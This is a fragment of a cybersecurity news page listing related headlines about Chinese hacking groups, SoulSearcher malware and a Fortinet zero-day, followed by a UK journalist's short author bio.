3.  Chinese Hackers Keep Targeting Group-IB Cybersecurity Firm
4.  Chinese Sharp Panda Group Unleashes SoulSearcher Malware
5.  Chinese Hackers Exploiting 0-day Vulnerability in Fortinet Products

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#windows